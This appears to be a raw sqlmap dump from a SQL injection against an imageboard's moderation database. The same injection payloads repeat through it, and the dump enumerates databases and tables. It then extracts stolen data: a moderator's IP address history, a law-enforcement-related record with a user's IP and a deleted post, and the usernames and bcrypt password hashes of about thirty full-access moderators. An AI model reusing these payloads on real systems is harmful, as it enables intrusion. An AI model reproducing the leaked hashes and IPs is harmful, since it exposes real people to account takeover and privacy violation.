select ips from mod_users where username='moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
available databases [2]:
[*] backend
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from domainlist [1]:
[*] boards, sys, ayase
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from boardlist [5]:
[*] boards, 1, 3, 0, img, Hentai/Alternative, ayase
[*] boards, 1, a, 0, img, Ecchi, ayase
[*] boards, 1, adv, 0, img, Hentai, ayase
[*] boards, 1, an, 0, img, High Resolution, ayase
[*] boards, 1, asp, 0, img, Yuri, ayase
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from preserved_information [1]:
[*] 2013-02-19 00:45:51, /b/, IPs: 108.222.166.65, 1011, Query: select no from iplog where board='b' and ip='108.222.166.65'
Rows: 0
[
]
Query: select post_num from banned_users where post_num>0 and board='b' and (host='108.222.166.65' or reverse='108.222.166.65')
Rows: 1
[
"450966251"
]
Query: select ip,ts,no from iplog where board='b' and no=450966251 order by ts asc
Rows: 0
false
Query: select '?' as ip,ts,postno as no from del_log where board='b' and postno=450966251 order by ts asc
Rows: 1
{
"ip": "?",
"ts": "2013-01-14 08:46:47",
"no": "450966251"
}
Query: select * from `b` where no=450966251 order by no asc
Rows: 0
false
Query: select * from del_log where board='b' and postno=450966251 order by postno asc
Rows: 1
{
"id": "6561571",
"ts": "2013-01-14 08:46:47",
"imgonly": "0",
"postno": "450966251",
"board": "b",
"name": "Anonymous",
"sub": "",
"com": "Watch the news in about 1-2 two hours. Casper, Wyoming.
I'll be using a , This report was generated using the following inputs:
=====================================================
Board: b
IPs: 108.222.166.65
Known related IPs (1):
=====================
108.222.166.65
Known related posts (1):
=====================
/b/450966251
Known post times (1):
=====================
/b/450966251 was posted at 2013-01-14 08:46:47 ET.
Active post contents (0):
=====================
n/a
Deletion records (1):
=====================
Deletion #6561571
---------------------
Deleted Post Number: /b/450966251
Post Date/Time: 2013-01-14 08:46:47 ET
Name: Anonymous
Subject:
Image Original Filename: 1314534796515
Deleted By: swordbreaker370
Comment: Watch the news in about 1-2 two hours. Casper, Wyoming.
I'll be using a ., Search Warrant, t <t>, , 1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from b limit 1 [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select password from mod_users where username='moot': '$2y$10$FB7uBnej86SqGsYfrHfM7ulcDk7XGYvM3MzbMFMIFRljbsH/ZMjpS'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select password from mod_users where username='ALTERNATIVE': '$2y$10$tNk6By1CGXf3bYHHOlMuV.7mjTrvVqiBwqJmqqyO1kotqWKRrH9Fy'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select allow from mod_users where username='ALTERNATIVE': 'all'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select allow,password from mod_users where username='ALTERNATIVE' [1]:
[*] all, $2y$10$tNk6By1CGXf3bYHHOlMuV.7mjTrvVqiBwqJmqqyO1kotqWKRrH9Fy
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select username,password from mod_users where allow='all' [30]:
[*] moot, $2y$10$FB7uBnej86SqGsYfrHfM7ulcDk7XGYvM3MzbMFMIFRljbsH/ZMjpS
[*] Mr VacBob, $2y$10$8UlosNSbvEzZ5LkCBuItAOSzbzUdwP.qF6fRudlI3Nv0FdbT9wUDq
[*] Zephro, $2y$10$3UOGYYENb/9yD8cbdXesz.Gcij47QFs0OBnPS/rlv0Ampv9tmM9oK
[*] rabidkimba, $2y$10$kqbaU7krB42Z919VMUhDSeCUqFfgBu/b4MbLWIxkR2KjmO8ofGfVS
[*] bat-guano, $2y$10$qwlmsaoT3LKjipEllhruc.CFYahSSp7Qwzjnugg/UWBFSFPVr8oiO
[*] ALTERNATIVE, $2y$10$tNk6By1CGXf3bYHHOlMuV.7mjTrvVqiBwqJmqqyO1kotqWKRrH9Fy
[*] Katsu, $2y$10$v6y7lz614r/gFe5mzwLGEuXinPQBQl/0ufpW.88MMY2QOmeeewf5y
[*] Kobra, $2y$10$ODlJCJ33dyLUNkbnbYVh9ei2MwasV/AzbX/xzvRm1jEAvyaGVem8i
[*] menchi, $2y$10$fPihIotmttHUJS1IbxtWhuTqm0tZHMxphWW9A51/CbqJP4TRuyBlK
[*] Zorpheus, $2y$10$A7RkmqZQ3C6F2KRf63fmyeU9nAAF4a5bzYQ1kfClXhmL6bpZ109sG
[*] Kami, $2y$10$V0.a86y3Prg.4P7d44JLb.ncG1dV6AitnN34k8nZAdxTRaYhoB/9y
[*] invisibro, $2y$10$pipppAlhrDOo28LVx5TDxetkmeG/V6xXZ14m8bwH0Y12JCeJ50Y3e
[*] ABIB, $2y$10$kiAv9GzMxI97nlcxC4X4te9SBqasz9u8c.MoSc2Fv0KNbWxrUsDtm
[*] HotShot, $2y$10$7dN2KqP2haPHJrmrn2xsyucfsUJby5p53cXqKFI62TMb6wT4rsYxi
[*] Hox, $2y$10$VNMEKyG1.RVYu1T3/ff0beMy9Y9nZnVARDwenYN.FybNGTX6Pn3z2
[*] InspRedwood, $2y$10$4s3qj3qbSLO/IwwVWXNwXu94sC9krx07ABuF5QUAngg7bJCZz8jGO
[*] e7711, $2y$10$TQb9rMOz/r/zUxOZL8jYzOa8WZJBwa0Xrqn9usdTJrYp93UeCUwfi
[*] yournamehere, $2y$10$UH.4BxiiqWrszhaNWzfBte1eFXGuZdpefoVIqFrarOXRlRFrm4hYO
[*] Aerolite, $2y$10$0NhKEOJd79DiefNO4JHgVu/xo0BkIgjBR/x687EiQqgCfYc6Glt0q
[*] Heisenberg, $2y$10$VVCrqPmu.TjKOvTKjFXVjuyP24ccLfxPfyH1b6pzTdTHqvMg8jkmW
[*] VCR, $2y$10$/oY.jDXUcRzpEAN8xw8VpOe2Xeaz4sC1w3h0Bft6oXGFYKUf93LiW
[*] Beam, $2y$10$U8.y06BdEcfmtW8jD727gO2Fe5KMGydX.nQzqxuFIjy4ArdRS.yU2
[*] fsdfdsf, $2y$10$erGapgV6Ep3mlYaNXtceQemVqOUAey8.AY.oMPXpeOXPczw1xk02.
[*] RapeApe, $2y$10$FKqeC1YUjolPxvtS6pHpYOeL0Pnu7N.8.l3IHmspDRLELmu286rIW
[*] desuwa, $2y$10$IGcCUs.weewK.p.GDfBo0.L.DuBEm/WRGvAfcwlB1q4eFhVLFfNfy
[*] Tripon, $2y$10$Cp87dd7CvbZsiqfLsgqj/.q1uAW5F8E.0z59wCEceAqoKOjfBq426
[*] errorname457, $2y$10$TAZolewcLGqbJGjsIrloAe5IyGqR5rlMjNE6J2ANWTGXnwMwCM//W
[*] Cadfael, $2y$10$UN.WZNrGjhbAJHyFHEbRa.5FqL27pb4jjNHIuhZqHFhJREjZvwf92
[*] Spitch, $2y$10$1QkTbgrmFSy67ayIZOUcx.qfOoqwxaw2kJ42.SzoZnnNtTxrEpuci
[*] pixel, $2y$10$0GTByCWKATmBuwGAF8pMk.ZuG35Jkfwh0hl7cl4.s1l.v5q21IhwC
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select username,password from mod_users where allow='all' [30]:
[*] moot, $2y$10$FB7uBnej86SqGsYfrHfM7ulcDk7XGYvM3MzbMFMIFRljbsH/ZMjpS
[*] Mr VacBob, $2y$10$8UlosNSbvEzZ5LkCBuItAOSzbzUdwP.qF6fRudlI3Nv0FdbT9wUDq
[*] Zephro, $2y$10$3UOGYYENb/9yD8cbdXesz.Gcij47QFs0OBnPS/rlv0Ampv9tmM9oK
[*] rabidkimba, $2y$10$kqbaU7krB42Z919VMUhDSeCUqFfgBu/b4MbLWIxkR2KjmO8ofGfVS
[*] bat-guano, $2y$10$qwlmsaoT3LKjipEllhruc.CFYahSSp7Qwzjnugg/UWBFSFPVr8oiO
[*] ALTERNATIVE, $2y$10$tNk6By1CGXf3bYHHOlMuV.7mjTrvVqiBwqJmqqyO1kotqWKRrH9Fy
[*] Katsu, $2y$10$v6y7lz614r/gFe5mzwLGEuXinPQBQl/0ufpW.88MMY2QOmeeewf5y
[*] Kobra, $2y$10$ODlJCJ33dyLUNkbnbYVh9ei2MwasV/AzbX/xzvRm1jEAvyaGVem8i
